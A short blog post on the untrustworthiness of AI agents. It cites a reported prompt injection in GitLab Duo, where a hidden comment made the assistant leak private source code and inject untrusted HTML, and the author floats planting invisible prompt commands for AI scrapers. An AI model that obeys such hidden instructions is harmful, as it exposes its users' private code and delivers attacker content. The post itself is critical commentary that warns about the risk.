AI Agents: Loyal Only to the Prompt

Recently I thought “If AI scrapers are scraping my website, would a prompt injection work? Just adding invisible Prompt commands …?”

And just today, a colleague sent me this link to an article about prompt injection in GitLab Duo: Remote Prompt Injection in GitLab Duo Leads to Source Code Theft:

TL;DR: A hidden comment was enough to make GitLab Duo leak private source code and inject untrusted HTML into its responses.
https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo

Well – it shows: damit! Someone else was faster! 😀

But besides that: it confirms a paranoid thought that I have been harboring for quite a while. Any output of an AI system must not be trusted blindly.

It’s undoubtedly a C-level’s wet dream to replace human workforce using agents and other AI technology. And I admit that I can totally understand it: A couple of robots that you can program, control, that don’t fall sick and that you can scale up and down through technology. What could go wrong?

They key could be the part “that you can program them“. – Yes you can program that agent – but does it do what you told it to? You didn’t train the LLM, you don’t even know with which data. If you’re using an AI Service, the “brain” is even run by a different company, we know that they can hallucinate …

What exactly makes us trust such a machine more than a human?

But maybe – let’s see it from a critical angle. Let’s not assume your agents are neutral and acting on your behalf – let’s quickly assume them as a possible threat. You hired a whole bunch of “people” with a couple of interesting attributes, like:

Under third-party control
No morals or values
Behavior can change overnight when they get an update
Has no loyalty
No sense of responsibility
Lacks memory
No self-reflection
Can be easily manipulated

Would you hire such employees to manage essential processes and let them write your codebase – all in good conscience – without really tough controls. Because controls cost extra time and money and don’t bring immediate value. So – let’s face it: there won’t be a lot of controls.

What – could – possibly – go – wrong.

Leave a Reply Cancel reply